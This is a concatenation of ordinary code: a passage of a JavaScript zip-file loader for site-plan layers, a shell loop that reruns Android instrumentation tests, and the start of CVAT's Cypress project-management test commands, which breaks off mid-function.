if(!this.sitesFilesInfo["sites"][origSiteId][origPlanId]) { this.sitesFilesInfo["sites"][origSiteId][origPlanId] = { imagesInfo: new COL.util.AssociativeArray(), metaDataFilesInfo: new COL.util.AssociativeArray() }; } let fileType = COL.util.getFileTypeFromFilename(filenameFullPath); switch(fileType) { case "jpg": case "png": { planImagesInfo = this.sitesFilesInfo["sites"][origSiteId][origPlanId].imagesInfo; isRegularFile = true; break; } case "json": case "txt": { planMetaDataFilesInfo = this.sitesFilesInfo["sites"][origSiteId][origPlanId].metaDataFilesInfo; isRegularFile = true; break; } default: { let msgStr = 'filename: ' + filename + ', fileType: ' + fileType + ' in .zip file is not supported'; throw new Error(msgStr); } } } else { if(FileZipUtils.isSharedDataBetweenAllSitePlans(filenameFullPath)) { if(!this.sitesFilesInfo["otherDataSharedBetweenAllSitePlans"]) { this.sitesFilesInfo["otherDataSharedBetweenAllSitePlans"] = new COL.util.AssociativeArray(); } otherDataSharedBetweenAllSitePlans = this.sitesFilesInfo["otherDataSharedBetweenAllSitePlans"]; isRegularFile = true; } else { console.error('dirname', dirname); console.error('matchResults', matchResults); let msgStr = 'Invalid filenameFullPath: ' + filenameFullPath; throw new Error(msgStr); } } } else { // This could be a directory, not an actual file console.log('The file does not have an extension, i.e. it is a directory'); console.log('filenameFullPath', filenameFullPath); isRegularFile = false; } let retVal = {}; retVal['origSiteId'] = origSiteId; retVal['origPlanId'] = origPlanId; retVal['planImagesInfo'] = planImagesInfo; retVal['planMetaDataFilesInfo'] = planMetaDataFilesInfo; retVal['otherDataSharedBetweenAllSitePlans'] = otherDataSharedBetweenAllSitePlans; retVal['isRegularFile'] = isRegularFile; // ImageInfo.PrintImagesInfo(retVal.planImagesInfo); // console.log('foo1'); return retVal; }; loadFilesFromZipFileInfoIntoBlobs = async function () { // console.log('BEG loadFilesFromZipFileInfoIntoBlobs'); // ///////////////////////////////////////////////////////////// // Load files from zip-file-info into blobs // skip jpg images // ///////////////////////////////////////////////////////////// console.log('Load files from zip file into blobs'); // loop over keys let zipFileInfo = COL.model.getZipFileInfo(); let filenames = Object.keys(zipFileInfo.files); // console.log('filenames', filenames); let numFiles = filenames.length; console.log('numFiles', numFiles); let countIndex = 0; let msgStr = "Loading " + numFiles + " files"; let numFilesBetweenReporting = 10; for (var key in filenames) { if( (countIndex % numFilesBetweenReporting) == 0 ) { // show progress - update the spinner, and send a log message with the number of files // that were loaded so far let msgStr = countIndex + " out of " + numFiles; console.log(msgStr); let spinnerEl = document.getElementById('cssLoaderId'); spinnerEl.setAttribute('data-text', msgStr); } countIndex += 1; let filenameFullPath = filenames[key]; let pathElements = COL.util.getPathElements(filenameFullPath); let dirname = pathElements['dirname']; let basename = pathElements['basename']; let extension = pathElements['extension']; // tbd replace fileExtention with filename let fileExtention = COL.util.getFileExtention(filenameFullPath); let filename = basename + '.' + fileExtention; // //////////////////////////////////////////////////////////////////////////////////// // get filesInfo for files that are related to the specified file // - all the planImagesInfo for the plan of the specified file // - all the planMetaDataFilesInfo for the plan of the specified file // - all the otherDataSharedBetweenAllSitePlans that are shared across all the sites and plans // - etc.. // //////////////////////////////////////////////////////////////////////////////////// let retVal = this.getFilesInfoForSpecifiedFilename(filenameFullPath); let planImagesInfo = retVal.planImagesInfo; let planMetaDataFilesInfo = retVal.planMetaDataFilesInfo; let otherDataSharedBetweenAllSitePlans = retVal.otherDataSharedBetweenAllSitePlans; let origSiteId = retVal.origSiteId; let origPlanId = retVal.origPlanId; let isRegularFile = retVal.isRegularFile; // console.log('filenameFullPath', filenameFullPath); if(!isRegularFile) { // skip e.g. directories continue; } let fileType = COL.util.getFileTypeFromFilename(filenameFullPath); let fileInfo = zipFileInfo.files[filenameFullPath]; switch(fileType) { case undefined: // e.g. skip directory names break; case "jpg": case "png": { // it looks like the imagesInfo is loaded from the json file let doSkip_loadImagesFromZipFile_imagesAreManagedViaJsonFile = true; if(doSkip_loadImagesFromZipFile_imagesAreManagedViaJsonFile) { break; } else { // separate to 2 groups: // a. floor plan images e.g. xxx_ground1.jpg // b. all other images e.g. IMG_6399.jpg // tbd - regex to match the floor plan images e.g. ground1... ? let re2 = /^image.*\.jpg$/; let overlayRectImageRegexMatched = filename.match(re2); if(overlayRectImageRegexMatched) { // do not load the actual image // Create a placeholder blobInfo, add blobInfo to imageInfo, add imageInfo to planImagesInfo let blobInfo = new BlobInfo({filenameFullPath: filenameFullPath, blobUrl: undefined, isDirty: true}); let imageInfo = new ImageInfo({filename: filename, blobInfo: blobInfo}); planImagesInfo.set(filename, imageInfo); } else { // load the actual image if (fileInfo.url) { // the blob is already in memory. Create a blobInfo from the blob, add blobInfo to imageInfo, add imageInfo to planImagesInfo let blobInfo = new BlobInfo({filenameFullPath: filenameFullPath, blobUrl: fileInfo.url, isDirty: true}); let imageInfo = new ImageInfo({filename: filename, blobInfo: blobInfo}); planImagesInfo.set(filename, imageInfo); } else { // the blob is not yet in memory. Extract the image let blobUrl = await this.getImageBlobUrlFromZipFile(filenameFullPath, planImagesInfo); // get the blob from the blobUrl // https://stackoverflow.com/questions/11876175/how-to-get-a-file-or-blob-from-an-object-url let response = await fetch(blobUrl); await COL.errorHandlingUtil.handleErrors(response); let blob = await response.blob(); let pathElements = COL.util.getPathElements(fileInfo.filename); let extension = pathElements['extension']; let imageTags = { filename: fileInfo.filename, imageOrientation: -1 }; if(extension === 'jpg') { imageTags = await COL.core.ImageFile.getImageTags(fileInfo.filename, blob); } let blobInfo = new BlobInfo({filenameFullPath: filenameFullPath, blobUrl: fileInfo.url, isDirty: true}); let imageInfo = new ImageInfo({filename: filename, imageTags: imageTags, blobInfo: blobInfo}); planImagesInfo.set(filename, imageInfo); } } break; } } case "json": { await FileZip_withJson.extractAsBlobUrl( fileInfo, 'text/plain' ); let blobInfo = new BlobInfo({filenameFullPath: filenameFullPath, blobUrl: fileInfo.url, isDirty: true}); let imageInfo = new ImageInfo({filename: filename, blobInfo: blobInfo}); if(FileZipUtils.isSharedDataBetweenAllSitePlans(filenameFullPath)) { otherDataSharedBetweenAllSitePlans.set(filename, imageInfo); } else { planMetaDataFilesInfo.set(filename, imageInfo); } // console.log('filenameFullPath', filenameFullPath); // console.log('blobInfo', blobInfo); let jsonData = await FileZipUtils.loadFile_viaFetch(filenameFullPath, blobInfo, "json"); // console.log('jsonData', jsonData); let notes_metadata_re = /notes/; let notes_metadata_re_matched = filename.match(notes_metadata_re); if(notes_metadata_re_matched) { if(COL.model.isStickyNotesEnabled()) { // // found notes metadata json file, i.e. sticky notes // COL.core.FileNotes.loadNotesFromJsonFile(layer, filename); } } break; } default: { let msgStr = 'filename: ' + filename + ', fileType: ' + fileType + ' in .zip file is not supported'; throw new Error(msgStr); } } } }; validateVersion = function () { // console.log('BEG validateVersion'); let modelVersion = COL.model.getModelVersion(); let minZipVersion = COL.model.getMinZipVersion(); let retval = true; if(!this.modelVersionInZipFile || (this.modelVersionInZipFile < minZipVersion)) { // the .zip file version is invalid (for reading the .zip file) console.error('modelVersionInZipFile is invalid. System model version: ' + modelVersion + " , modelVersionInZipFile: " + modelVersionInZipFile + " , minZipVersion supported: " + minZipVersion); retval = false; } return retval; }; validateVersionAndExtractSitesInfo = async function () { // console.log('BEG validateVersionAndExtractSitesInfo'); // ///////////////////////////////////////////////////////////// // validate the version in the zipFile // Extract sitesInfo - based on sitesInfo we create the various layers // ///////////////////////////////////////////////////////////// // Get general metadata let generalMetadataFilename = "general_metadata.json"; let imagesInfoOtherData = this.sitesFilesInfo["otherDataSharedBetweenAllSitePlans"]; let imageInfoOtherData = imagesInfoOtherData.getByKey(generalMetadataFilename); let blobInfo = imageInfoOtherData.blobInfo; if(COL.util.isObjectInvalid(blobInfo) || COL.util.isObjectInvalid(blobInfo.blobUrl)) { // should not reach here imagesInfoOtherData.printKeysAndValues(); console.log('generalMetadataFilename', generalMetadataFilename); console.error('Missing file: ' + generalMetadataFilename ); return false; } let generalInfo = await FileZipUtils.loadFile_viaFetch(generalMetadataFilename, blobInfo, "json"); let modelVersionInZipFile = parseFloat(COL.util.getNestedObject(generalInfo, ['generalInfo', 'modelVersion'])); this.setModelVersionInZipFile(modelVersionInZipFile); // Validate version if( !this.validateVersion() ) { // should not reach here var msgStr = 'Version validation failed'; throw new Error(msgStr); } // Get sitesInfo let sitesInfoFilename = "sitesInfo.json"; let imageInfoOtherData2 = imagesInfoOtherData.getByKey(sitesInfoFilename); let blobInfo1 = imageInfoOtherData2.blobInfo; if(COL.util.isObjectInvalid(blobInfo1) || COL.util.isObjectInvalid(blobInfo1.blobUrl)) { // should not reach here imagesInfoOtherData.printKeysAndValues(); console.log('sitesInfoFilename', sitesInfoFilename); console.error('Missing file: ' + sitesInfoFilename ); return false; } // load via fetch from blob URL that is in memory (not on webserver) let sitesInfo_inFileZip = await FileZipUtils.loadFile_viaFetch(sitesInfoFilename, blobInfo1, "json"); /////////////////////////////////////////////////////////////// // fill-in this.sitesInfo_inFileZip // convert from: // sitesInfo_inFileZip (uses: snake format, dictionary of dictionaries) // to: // sitesInfo_inFileZip (uses: camelCase format, AssociativeArray of AssociativeArrays) /////////////////////////////////////////////////////////////// this.sitesInfo_inFileZip = new COL.util.AssociativeArray(); for (let siteId_inFileZip in sitesInfo_inFileZip) { let siteInfo_inFileZip = sitesInfo_inFileZip[siteId_inFileZip]; // console.log('siteInfo_inFileZip', siteInfo_inFileZip); let siteInfo = COL.model.createSiteInfoFromJson(siteInfo_inFileZip, this.modelVersionInZipFile) // console.log('siteInfo3', siteInfo.toString()); this.sitesInfo_inFileZip.set(siteId_inFileZip, siteInfo); } COL.model.setSitesInfo(this.sitesInfo_inFileZip); // https://stackoverflow.com/questions/22266171/javascript-html-select-add-optgroup-and-option-dynamically let iterSites = this.sitesInfo_inFileZip.iterator(); while (iterSites.hasNext()) { let siteInfo_inFileZip = iterSites.next(); let optionGroupEl = $('<optgroup label="' + siteInfo_inFileZip.siteId + '" />'); let iterPlans = siteInfo_inFileZip.getPlans().iterator(); while (iterPlans.hasNext()) { let planInfo_inFileZip = iterPlans.next(); let path = planInfo_inFileZip.siteId + '/' + planInfo_inFileZip.id; let planFilenameFullPath = path + '/' + planInfo_inFileZip.planFilename; this.layerJsonFilenames.push(planFilenameFullPath); // the string in the sitePlan menu let optionVal = planInfo_inFileZip.siteId + ":" + planInfo_inFileZip.id + ":" + planInfo_inFileZip.siteName + ":" + planInfo_inFileZip.name; $('<option />').html(optionVal).appendTo(optionGroupEl); } console.log('optionGroupEl', optionGroupEl); optionGroupEl.appendTo($('#sitesId')); } }; createLayers = function () { console.log('BEG createLayers'); for (let index in this.layerJsonFilenames) { let topDownJsonFullPath = this.layerJsonFilenames[index]; let pathElements = COL.util.getPathElements(topDownJsonFullPath); let dirname = pathElements['dirname']; let layerJsonFilename = pathElements['filename']; let retVal = this.getFilesInfoForSpecifiedFilename(topDownJsonFullPath); // let imagesInfo = retVal.imagesInfo; let planMetaDataFilesInfo = retVal.planMetaDataFilesInfo; // let otherDataSharedBetweenAllSitePlans = retVal.otherDataSharedBetweenAllSitePlans; let origSiteId = retVal.origSiteId; let origPlanId = retVal.origPlanId; let metaDataFileInfo = planMetaDataFilesInfo.getByKey(layerJsonFilename); let blobInfo = metaDataFileInfo.blobInfo; if(COL.util.isObjectInvalid(blobInfo) || COL.util.isObjectInvalid(blobInfo.blobUrl)) { // should not reach here planMetaDataFilesInfo.printKeysAndValues(); let msgStr = 'Invalid blobInfo for layerJsonFilename: ' + layerJsonFilename; throw new Error(msgStr); } // Get the plan from the path let planInfo = COL.model.getPlanInfoBySiteIdAndPlanId(origSiteId, origPlanId); let layer = COL.model.createLayer(planInfo); COL.model.addLayer(layer); } }; populateLayers = async function () { // console.log('BEG populateLayers'); // let numPlans = $("#sitesId option").length; // console.log('numPlans1', numPlans); // ///////////////////////////////////////////////////////////// // fill in layers with metaDataFilesInfo (e.g. layerJsonFilename) // ///////////////////////////////////////////////////////////// let layer0 = undefined; for (let index in this.layerJsonFilenames) { let topDownJsonFullPath = this.layerJsonFilenames[index]; let retVal = this.getFilesInfoForSpecifiedFilename(topDownJsonFullPath); let origSiteId = retVal.origSiteId; let origPlanId = retVal.origPlanId; let imagesInfo = this.sitesFilesInfo["sites"][origSiteId][origPlanId].imagesInfo; let metaDataFilesInfo = this.sitesFilesInfo["sites"][origSiteId][origPlanId].metaDataFilesInfo; let pathElements = COL.util.getPathElements(topDownJsonFullPath); let layerJsonFilename = pathElements['filename']; // Get the plan from the path let planInfo = COL.model.getPlanInfoBySiteIdAndPlanId(origSiteId, origPlanId); if(COL.util.isObjectInvalid(planInfo)) { // The .zip file has topDownJsonFullPath (e.g. 1/2/modelWith4Images.structure.layer0.json) // that is not in the file sitesInfo.json (e.g. that includes only part of the json files, e.g. // 6/8/modelWith4Images.structure.layer0.json, 6/9/modelWith4Images.structure.layer0.json, 7/10/modelWith4Images.structure.layer0.json // but not 1/2/modelWith4Images.structure.layer0.json) // this is part of bug "only save content that refers ... in notesConstructionOverlay.WebServer.v2.txt" // that will be fixed in tbd let msgStr = "origSiteId/origPlanId: " + origSiteId + "/" + origPlanId; console.warn('planInfo is undefined for: ', msgStr); continue; } let layer = COL.model.getLayerByPlanInfo(planInfo); if(COL.util.isObjectInvalid(layer)) { // sanity check // At this point the layer should already be created (pre-exists before reading from the zip file or added in the block above) throw new Error('layer is invalid'); } ////////////////////////////////////////////////////////////////////////////////// // populate the layer with metaDataFilesInfo ////////////////////////////////////////////////////////////////////////////////// // tbd - layer.setImagesInfo is called later on in the function again - maybe not needed here. layer.setImagesInfo(imagesInfo); layer.setMetaDataFilesInfo(metaDataFilesInfo); let topDownJsonFileInfo = metaDataFilesInfo.getByKey(layerJsonFilename); let topDownJsonBlobInfo = topDownJsonFileInfo.blobInfo; if(COL.util.isObjectInvalid(topDownJsonBlobInfo) || COL.util.isObjectInvalid(topDownJsonBlobInfo.blobUrl)) { metaDataFilesInfo.printKeysAndValues(); let msgStr = 'Invalid blobInfo for layerJsonFilename: ' + layerJsonFilename; throw new Error(msgStr); } await FileZipUtils.loadFile_viaFetch(layerJsonFilename, topDownJsonBlobInfo, "json"); ////////////////////////////////////////////////////////////////////////////////// // populate the layer with imagesInfo ////////////////////////////////////////////////////////////////////////////////// // Load files related to topDownJson file (e.g. floorPlan image file, overlay image files) into imageInfoVec await COL.loaders.CO_ObjectLoader.loadLayerJsonFile_fromZipFile(layerJsonFilename, layer); let imageInfoVec = layer.getImagesInfo(); // loop over the entries of imageInfoVec. Construct blobInfo for every entry let iter = imageInfoVec.iterator(); while (iter.hasNext()) { let keyVal = iter.nextKeyVal(); let filename = keyVal[0]; let imageInfo = keyVal[1]; let imageFilenameFullPath = origSiteId + '/' + origPlanId + '/' + filename; let blobInfo = new BlobInfo({filenameFullPath: imageFilenameFullPath, blobUrl: undefined, isDirty: false}); imageInfo.blobInfo = blobInfo; } // Merge entries in imageInfoVec into imagesInfo imagesInfo.mergeArray(imageInfoVec); layer.setImagesInfo(imagesInfo); layer.setLayerJsonFilename(layerJsonFilename); layer0 = layer; } // ///////////////////////////////////////////////////////////// // tbd - setSelectedLayer to the first layer ? // ///////////////////////////////////////////////////////////// COL.model.setSelectedLayer(layer0); let selectedLayer = COL.model.getSelectedLayer(); let imagesInfo = selectedLayer.getImagesInfo(); // imagesInfo.printKeysAndValues(); $(document).trigger("SceneLayerAdded", [layer0, COL.model.getLayers().size()]); console.log('layer0', layer0); console.log('layer0.planInfo', layer0.planInfo); let matchPattern = layer0.planInfo.siteId + ":" + layer0.planInfo.id + ":" + layer0.planInfo.siteName + ":" + layer0.planInfo.name; let sceneBar = COL.model.getSceneBar(); let optionIndex = sceneBar.findOptionIndexBySubstrInVal(matchPattern); if(optionIndex) { $('#sitesId')[0].selectedIndex = optionIndex; } return true; }; // create blobInfo (if needed, extract blob as blob url), add to the imagesInfo or metaDataFilesInfo list, and return blobInfo // filesInfo is a placeholder for imagesInfo, or metaDataFilesInfo: // - When adding an image file (e.g. .jpg, .png), filesInfo === imagesInfo // - When adding an metaData file (e.g. .json, .txt), filesInfo === metaDataFilesInfo addBlobToFilesInfo = async function (filenameFullPath, filesInfo) { try { // loop over keys let pathElements = COL.util.getPathElements(filenameFullPath); let dirname = pathElements['dirname']; let filename = pathElements['filename']; var fileExtention = COL.util.getFileExtention(filename); let zipFileInfo = COL.model.getZipFileInfo(); let fileInfo = zipFileInfo.files[filenameFullPath]; if (fileInfo.url) { // manageMemory() is NOT taking care of Model::_zipFileInfo.files (but just of Layer::_imagesInfo) // as quick workaround revoke every url, so every url is loaded from the zip file from scratch URL.revokeObjectURL(fileInfo.url); fileInfo.url = null; } let blobInfo; let fileType2 = COL.util.getFileTypeFromFilename(filename); switch(fileType2) { case "jpg": case "png": { if (fileInfo.url) { // the url already exists blobInfo = new BlobInfo({filenameFullPath: filenameFullPath, blobUrl: fileInfo.url, isDirty: true}); let imageInfo = new ImageInfo({filename: filename, blobInfo: blobInfo}); filesInfo.set(filename, imageInfo); } else { // the url does not exist let fileType = 'image/png'; if(fileExtention === "png") { fileType = 'image/png'; } else { fileType = 'image/jpeg'; } await FileZip_withJson.extractAsBlobUrl( fileInfo, fileType ); blobInfo = new BlobInfo({filenameFullPath: filenameFullPath, blobUrl: fileInfo.url, isDirty: false}); let pathElements = COL.util.getPathElements(fileInfo.filename); let extension = pathElements['extension']; // initialize imageTags to default values let imageTags = { filename: fileInfo.filename, imageOrientation: -1 }; if(extension === 'jpg') { let blob = await fetch(blobInfo.blobUrl).then(r => r.blob()); imageTags = await COL.core.ImageFile.getImageTags(fileInfo.filename, blob); } let imageInfo = new ImageInfo({filename: filenameFullPath, imageTags: imageTags, blobInfo: blobInfo}); filesInfo.set(filename, imageInfo); } break; } case "json": { await FileZip_withJson.extractAsBlobUrl( fileInfo, 'text/plain' ); blobInfo = new BlobInfo({filenameFullPath: filenameFullPath, blobUrl: fileInfo.url, isDirty: true}); let imageInfo = new ImageInfo({filename: filename, blobInfo: blobInfo}); filesInfo.set(filename, imageInfo); break; } default: { var msgStr = 'filename: ' + filename + ', fileExtension: ' + fileExtention + ' in .zip file is not supported'; throw new Error(msgStr); } } return blobInfo; } catch (err) { console.error('err', err); throw new Error(400); } }; getImageBlobUrlFromZipFile = async function (imageFilenameFullPath, imagesInfo) { // console.log('BEG getImageBlobUrlFromZipFile'); let zipFileInfo = COL.model.getZipFileInfo(); if(!zipFileInfo.files[imageFilenameFullPath]) { // console.log('zipFileInfo.files', zipFileInfo.files); let msgStr = 'zipFileInfo.files[imageFilenameFullPath] is undefined. imageFilename: ' + imageFilenameFullPath; throw msgStr; } // The file is not yet in memory, but its offset is stored in memory. // Load the file from the zip file into memory and render // unzip the image files (that were skipped in the initial load) // tbd - set doReadArrayBufferInChunks, if the zip file size passes a threshold (500 MB?) let sliceBeg = zipFileInfo.files[imageFilenameFullPath].offsetInZipFile; let sliceEnd = sliceBeg + zipFileInfo.files[imageFilenameFullPath].headerSize + zipFileInfo.files[imageFilenameFullPath].compressedSize; let doSkipFileData = false; let zipLoaderForSlice = await FileZip_withJson.loadFromZipFile(sliceBeg, sliceEnd, doSkipFileData); let fileInfo = zipLoaderForSlice.files[imageFilenameFullPath]; zipFileInfo.files[imageFilenameFullPath].buffer = fileInfo.buffer; let blobInfo = await COL.model.fileZip.addBlobToFilesInfo(imageFilenameFullPath, imagesInfo); return blobInfo.blobUrl; }; // -------------------------------------------------------------- isExtensionValid = function (extension) { switch (extension.toLowerCase()) { case "zip": return true; } return false; } // Loads slice from the zip file static getZipFileSlice = async function(sliceBeg, sliceEnd) { // console.log('BEG getZipFileSlice'); let zipFileInfo = COL.model.getZipFileInfo(); let zipFile = zipFileInfo.zipFile; let zipFileName = zipFileInfo.zipFileName; let blobSlice = null; if( COL.util.isObjectInvalid(window.$agent) ) { // in native webapp blobSlice = zipFile.slice(sliceBeg, sliceEnd); } else { // in mobile app (e.g. jasonette-android) const queryParams = new URLSearchParams({ sliceBeg: sliceBeg, sliceEnd: sliceEnd }); // create the query params string with sliceBeg, sliceEnd let queryParamsStr = queryParams.toString(); // e.g. "sliceBeg=0&sliceEnd=5000" console.log('queryParamsStr: ', queryParamsStr); // create the url string let url = COL.model.getUrlBase() + 'zipfile?' + queryParamsStr; let response = await fetch(url); // console.log('response.status', response.status); await COL.errorHandlingUtil.handleErrors(response); blobSlice = await response.blob(); } return blobSlice; }; // Loads blob slice (optionally the entire blob) from the zip file, and reads it into the layer static loadFromZipFile = async function (sliceBeg, sliceEnd, doSkipFileData) { // console.log('BEG loadFromZipFile'); let blobSlice = await FileZip_withJson.getZipFileSlice(sliceBeg, sliceEnd); // https://developer.mozilla.org/en-US/docs/Web/API/Blob/arrayBuffer // read the array buffer (blob.arrayBuffer() is newer than readAsArrayBuffer()) let blobSliceArrayBuffer = await blobSlice.arrayBuffer(); // console.log('blobSliceArrayBuffer.byteLength', blobSliceArrayBuffer.byteLength); // let dataView = new DataView(blobSliceArrayBuffer); ApiService.LOAD_FROM_TYPE = ApiService.API_SERVICE_TYPES.ApiServiceZip; // console.log('blobSlice.size', blobSlice.size); let zipLoader = await ZipLoader.unzip( blobSliceArrayBuffer, doSkipFileData ); return zipLoader; }; // this function is called for the native webapp. (in case of mobile webapp // loading the zip file headers is done by trigerring a call to jasonette). loadZipfileHeaders = async function (zipFile) { // console.log('BEG loadZipfileHeaders'); // store the zip file object. It is used for reading specific files // individually from the zip file, later on let zipFileInfo = { zipFile: zipFile, zipFileName: zipFile.name, files: {} }; COL.model.setZipFileInfo(zipFileInfo); // console.log('Unzip the file', zipFile.name); // Read the entire file to get the offsets let doSkipFileData = true; // console.log('zipFile.size', zipFile.size); // MAX_BLOB_SLICE_SIZE_IN_BYTES needs to be bigger than the maximum individual file in the .zip file // 100 MB const MAX_BLOB_SLICE_SIZE_IN_BYTES = Number("1E8"); let sliceBeg = 0; let numTotalBytesRead = 0; while(numTotalBytesRead < zipFile.size) { let sliceEnd = (sliceBeg + MAX_BLOB_SLICE_SIZE_IN_BYTES < zipFile.size) ? sliceBeg + MAX_BLOB_SLICE_SIZE_IN_BYTES : zipFile.size; let zipLoader = await FileZip_withJson.loadFromZipFile(sliceBeg, sliceEnd, doSkipFileData); if(zipLoader.numBytesRead == 0) { // nothing was read in the last slice, i.e. we reached the last zip entry break; } // loop over the zipLoader.files // calc the absolute file offset from the relative offset to the blobSlice for (const filenameFullPath of Object.keys(zipLoader.files)) { zipLoader.files[filenameFullPath].offsetInZipFile += sliceBeg; zipFileInfo.files[filenameFullPath] = zipLoader.files[filenameFullPath]; } sliceBeg += zipLoader.numBytesRead; numTotalBytesRead += zipLoader.numBytesRead; } }; // Loads the zip file, and reads it into the layer. // The zip file is loaded in slices. // The variable zipFile is only used in native webapp. // In mobile app, the zipfile info is taken from model._zipFileInfo.files openSingleZipFile = async function (zipFile) { console.log('BEG openSingleZipFile'); let spinnerJqueryObj = $('#cssLoaderId'); spinnerJqueryObj.addClass("is-active"); let toastTitleStr = "Load from zip file"; try{ if( COL.util.isObjectInvalid(window.$agent) ) { // in native app if (!(zipFile instanceof File)) { console.error("Error from openSingleZipFile(): the parameter 'zipFile' must be a File instance."); throw new Error('Error from openSingleZipFile'); } // Add zipFile to opened list this.openedZipFileList.set(zipFile.name, zipFile); // Validate file extension let extension = COL.util.getFileTypeFromFilename(zipFile.name); if (!this.isExtensionValid(extension)) { console.error("The file must have '.zip' suffix. \nTry again."); spinnerJqueryObj.removeClass("is-active"); throw new Error("Not a zip file: " + zipFile.name); } // load the zip file headers console.time("time loadZipfileHeaders"); await this.loadZipfileHeaders(zipFile); console.timeEnd("time loadZipfileHeaders"); } else { // in mobile app - the headers are already loaded // (in model._zipFileInfo.files ) } FileZipUtils.filenamesFailedToLoad = []; console.time("time loadFilesFromZipFileInfoIntoBlobs"); await this.loadFilesFromZipFileInfoIntoBlobs(); console.timeEnd("time loadFilesFromZipFileInfoIntoBlobs"); await this.validateVersionAndExtractSitesInfo(); this.createLayers(); await this.populateLayers(); await COL.colJS.onSitesChanged(); let msgStr = "Succeeded to load"; if(COL.doEnableToastr) { toastr.success(msgStr, toastTitleStr, COL.errorHandlingUtil.toastrSettings); } else { console.log(msgStr); // alert(msgStr); } } catch(err) { console.error('err', err); let filenamesFailedToLoadAsStr = FileZipUtils.filenamesFailedToLoad.join(); let msgStr = "Failed to load. "; if(filenamesFailedToLoadAsStr !== '') { // let msgStr = "Failed to load from zip file. Failed files: " + filenamesFailedToLoadAsStr; // COL.errorHandlingUtil.bootstrap_alert_danger(msgStr); msgStr += "Failed files: " + filenamesFailedToLoadAsStr; } else { msgStr += err; } if(COL.doEnableToastr) { toastr.error(msgStr, toastTitleStr, COL.errorHandlingUtil.toastrSettings); } else { console.error(msgStr); // alert(msgStr); } } spinnerJqueryObj.removeClass("is-active"); }; static addNewPlan = async function (planInfo) { console.log('BEG addNewPlan'); let getSiteByNameResultAsJson = await COL.model.getSiteByName(planInfo.siteName); let siteId = null; if(getSiteByNameResultAsJson.name) { let siteName = getSiteByNameResultAsJson.name; let msgStr = 'siteName: ' + siteName + ' already exists for the user'; console.log(msgStr); siteId = getSiteByNameResultAsJson.id; } else { let msgStr = 'siteName: ' + planInfo.siteName + ' do NOT exist for the user'; console.log(msgStr); let addNewSiteResultAsJson = await FileZipUtils.addNewSite(planInfo); siteId = addNewSiteResultAsJson.id; } // tbd - add the plan and update planInfo let addNewSitePlanResultAsJson = await FileZip_withJson.addNewSitePlan(siteId, planInfo); console.log('addNewSitePlanResultAsJson', addNewSitePlanResultAsJson); return addNewSitePlanResultAsJson; }; // extractAsBlobUrl fills-in fileInfo.buffer, (fileInfo points to an entry in zipFileInfo.files[xxx]) static extractAsBlobUrl = async function (fileInfo, type) { // console.log('BEG extractAsBlobUrl'); if (fileInfo.url) { return fileInfo.url; } if(COL.util.isObjectInvalid(fileInfo.buffer)) { // get the buffer await FileZip_withJson.readZipEntryData(fileInfo.filename); if(COL.util.isObjectInvalid(fileInfo.buffer)) { throw new Error("Failed to read the buffer for file: " + fileInfo.filename); } } var blob = new Blob([fileInfo.buffer], { type: type }); fileInfo.url = URL.createObjectURL(blob); return; }; // Load the image file data from the zip file as blob into memory static readZipEntryData = async function (filename) { // console.log('BEG readZipEntryData'); let zipFileInfo = COL.model.getZipFileInfo(); let zipFileInfoFile = zipFileInfo.files[filename]; let sliceBeg = zipFileInfo.files[filename].offsetInZipFile; let sliceEnd = sliceBeg + zipFileInfo.files[filename].headerSize + zipFileInfo.files[filename].compressedSize; let doSkipFileData = false; let zipLoaderForSlice = await FileZip_withJson.loadFromZipFile(sliceBeg, sliceEnd, doSkipFileData); zipFileInfo.files[filename].buffer = zipLoaderForSlice.files[filename].buffer; }; static addNewSitePlan = function (siteId, planInfo) { console.log('BEG addNewSitePlan'); return new Promise(async function(resolve, reject) { // //////////////////////////////////////////////// // POST - Add new metadata // //////////////////////////////////////////////// console.log('planInfo', planInfo); let plan_url = planInfo.planFilename; let jsonData = {plan_name: planInfo.name, plan_url: plan_url, is_selected: false, site_id: siteId}; let jsonDataAsStr = JSON.stringify(jsonData); console.log('jsonDataAsStr', jsonDataAsStr); let postNewSitePlanUrl = COL.model.getUrlBase() + 'api/v1_2/create_plan'; let headersData = { 'Content-Type': 'application/json', 'X-CSRF-Token': COL.model.csrf_token }; let fetchData = { method: 'POST', body: jsonDataAsStr, headers: headersData }; let dataAsJson = await fetch(postNewSitePlanUrl, fetchData).then(response => response.json()); resolve(dataAsJson); }); }; }; export { FileZip_withJson };
while ((1)) do adb shell am instrument -w com.android.test.qutoutiao.test/android.support.test.runner.AndroidJUnitRunner sleep 3 done
<reponame>ACHultman/cvat // Copyright (C) 2020-2022 Intel Corporation // // SPDX-License-Identifier: MIT /// <reference types="cypress" /> Cypress.Commands.add('goToProjectsList', () => { cy.get('[value="projects"]').click(); cy.url().should('include', '/projects'); cy.get('.cvat-spinner').should('not.exist'); }); Cypress.Commands.add( 'createProjects', (projectName, labelName, attrName, textDefaultValue, multiAttrParams, expectedResult = 'success') => { cy.get('#cvat-create-project-button').click(); cy.get('#name').type(projectName); cy.get('.cvat-constructor-viewer-new-item').click(); cy.get('[placeholder="Label name"]').type(labelName); cy.get('.cvat-new-attribute-button').click(); cy.get('[placeholder="Name"]').type(attrName); cy.get('.cvat-attribute-type-input').click(); cy.get('.cvat-attribute-type-input-text').click(); cy.get('[placeholder="Default value"]').type(textDefaultValue); if (multiAttrParams) { cy.updateAttributes(multiAttrParams); } cy.contains('button', 'Done').click(); cy.get('.cvat-create-project-content').within(() => { cy.contains('Submit').click(); }); if (expectedResult === 'success') { cy.get('.cvat-notification-create-project-success').should('exist').find('[data-icon="close"]').click(); } else if (expectedResult === 'fail') { cy.get('.cvat-notification-create-project-success').should('not.exist'); } cy.goToProjectsList(); }, ); Cypress.Commands.add('deleteProjects', (authResponse, projectsToDelete) => { const authKey = authResponse.body.key; cy.request({ url: '/api/projects?page_size=all', headers: { Authorization: `Token ${authKey}`, }, }).then((_response) => { const responceResult = _response.body.results; for (const project of responceResult) { const { id, name } = project; for (const projectToDelete of projectsToDelete) { if (name === projectToDelete) { cy.request({ method: 'DELETE', url: `/api/projects/${id}`, headers: { Authorization: `Token ${authKey}`, }, }); } } } }); }); Cypress.Commands.add('openProject', (projectName) => { cy.contains(projectName).click({ force: true }); cy.get('.cvat-project-details').should('exist'); }); Cypress.Commands.add('projectActions', (projectName) => { cy.contains('.cvat-projects-project-item-title', projectName) .parents('.cvat-projects-project-item-card') .within(() => { cy.get('.cvat-porjects-project-item-description').within(() => { cy.get('[type="button"]').trigger('mouseover'); }); }); }); Cypress.Commands.add('deleteProject', (projectName, projectID, expectedResult = 'success') => { 